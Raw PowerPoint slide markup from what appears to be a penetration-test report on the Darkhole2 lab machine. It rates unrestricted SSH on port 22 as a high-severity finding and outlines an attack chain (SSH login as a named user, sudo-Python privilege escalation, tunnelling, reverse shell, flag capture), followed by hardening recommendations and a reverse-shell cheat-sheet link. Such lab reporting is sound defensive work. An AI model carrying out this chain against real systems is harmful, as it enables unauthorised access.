                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://highon.coffee/blog/reverse-shell-cheat-sheet/](https://highon.coffee/blog/reverse-shell-cheat-sheet/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Nmap Official Documentation: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://nmap.org/book/man.html](https://nmap.org/book/man.html</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Burp Suite – Web Security Testing Tool: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://portswigger.net/burp](https://portswigger.net/burp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Linux File Permissions Guide – Red Hat: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.redhat.com/en/blog/linux-file-permissions-explained</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>OWASP – Broken Access Control / File Permissions:                                                                                  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://owasp.org/www-project-top-ten/2017/A5\_2017-Broken\_Access\_Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>OpenSSH Security Guide:                                                                                                                         </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.ssh.com/academy/ssh/security-best-practices](https://www.ssh.com/academy/ssh/security-best-practices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Kali Linux – Offensive Security OS: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.kali.org</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>CVSS calculator: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://www.first.org/cvss/calculator/3-0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3791785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4822-3969-A9C5-8AF3-FC1FA3B24CBE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1069848" y="2303493"/>
            <a:ext cx="10058400" cy="1609344"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-IN" sz="6000" u="sng" dirty="0"/>
              <a:t>THANK YOU</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="135843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30E9F-7BFA-A01A-7693-4265CA258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A31BAA-356B-2206-DD97-BA92CA5DC125}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Open SSH Port (22) Without Restriction</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3AB0B0B1-1542-1A61-16B2-0886FF557E53}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="281608" y="924340"/>
            <a:ext cx="11628783" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Unrestricted SSH Access (Port 22)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Vulnerability Description: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The SSH service running on port 22 is openly accessible from any external IP address without any firewall restrictions. This allows to attempt connections over the network, making the system susceptible to brute-force attacks, enumeration, and exploitation of known vulnerabilities if the SSH service is outdated or misconfigured.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Affected Machine/URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t>Darkhole2 – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Machine IP:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" u="sng" dirty="0"/>
              <a:t>192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Service:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" dirty="0"/>
              <a:t> SSH (Port 22)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Severity: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" i="1" dirty="0"/>
              <a:t>High</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, due to the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>real exploitation of SSH access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> using recovered credentials, the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>lack of IP restriction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>chaining with privilege escalation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Risk/Impact: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The unrestricted exposure of SSH (port 22) on the target machine (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" i="1" u="sng" dirty="0"/>
              <a:t>192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) poses a serious risk. The service is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>publicly accessible</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, with no IP-based filtering or firewall protection, allowing </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>any attacker to attempt brute-force login or credential stuffing</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>Access user-level shell through SSH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" i="1" dirty="0"/>
              <a:t>ssh </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" i="1" dirty="0">
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>jehad@192.168.139.143</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>    Escalate privileges to root</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> using a misconfigured ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" i="1" dirty="0" err="1"/>
              <a:t>sudo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>’</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Python binary.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>    Create an SSH tunnel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> to access an internal web service on port.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" dirty="0"/>
              <a:t>    Execute a remote reverse shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>, leading to full system compromise.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>    Capture the final flag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>, indicating complete attacker control.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="369548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74FD1-9431-C431-4EA4-73DE0315AF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F42FFD-015D-59E3-EE78-00031BA36410}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Cont..</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E3C7907E-D6AA-CEA0-A257-4D53AE80131B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="6867940" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Recommendations</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t> Restrict SSH access to trusted IPs using firewall rules (e.g., iptables, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0" err="1"/>
              <a:t>ufw</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t>).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t> Disable password-based login and use key-based authentication.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t> Change the default SSH port (optional).</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t> Enable login rate-limiting using tools like fail2ban.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t> Monitor SSH logs regularly for abnormal login att. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0" err="1"/>
              <a:t>Empts</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1900" b="1" dirty="0"/>
              <a:t>CVSS Score: 8.1 (High)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS String: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="pt-BR" sz="1800" b="1" dirty="0"/>
              <a:t>CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" dirty="0"/>
              <a:t>Reference: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0070C0"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId2">
                  <a:extLst>
                    <a:ext uri="{A12FA001-AC4F-418D-AE19-62706E023703}">
                      <ahyp:hlinkClr xmlns:ahyp="http://schemas.microsoft.com/office/drawing/2018/hyperlinkcolor" val="tx"/>
                    </a:ext>
                  </a:extLst>
                </a:hlinkClick>
              </a:rPr>
              <a:t>https://medium.com/weeklycloud/how-ssh-really-works-4d8a6a862409</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" i="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0070C0"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Proof of Concept (PoC): </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>1. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>Discovering Open Port via Nmap </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>. Attempting SSH Login 	</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" b="1" dirty="0"/>
              <a:t>3</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-IN" sz="2000" dirty="0"/>
              <a:t>. Tunnel internal services </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-IN" sz="1800" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-IN" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AD6A5EB2-69CE-0109-C5E8-D7279BC803FC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8010340" y="689365"/>
            <a:ext cx="2783839" cy="1264513"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>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50268B6F-FF70-E504-3EF1-49AE7E4E0C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7996247" y="2640925"/>
            <a:ext cx="2812024" cy="623596"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">
                <a:satMod val="175000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:glow>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77C0BEF3-0BEE-4CBA-28E0-DD11FDCF55B5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7611560" y="3782007"/>
            <a:ext cx="3581398" cy="1616239"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:glow rad="101600">
              <a:schemeClr val="accent3">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169291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69BD6-377A-E63C-3AE0-4F9EE09EA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65488B-994A-6169-385C-69C117E366EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1066800" y="256033"/>
            <a:ext cx="10058400" cy="549038"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3600" dirty="0"/>
              <a:t>Cont..</a:t>
            </a:r>
            <a:endParaRPr lang="en-IN" sz="3600" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DC215713-EFAC-8D02-C874-6DA4D7D8E603}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="258418" y="805071"/>
            <a:ext cx="6569766" cy="5367129"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-IN" b="1" dirty="0"/>
              <a:t>Process Analysis: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
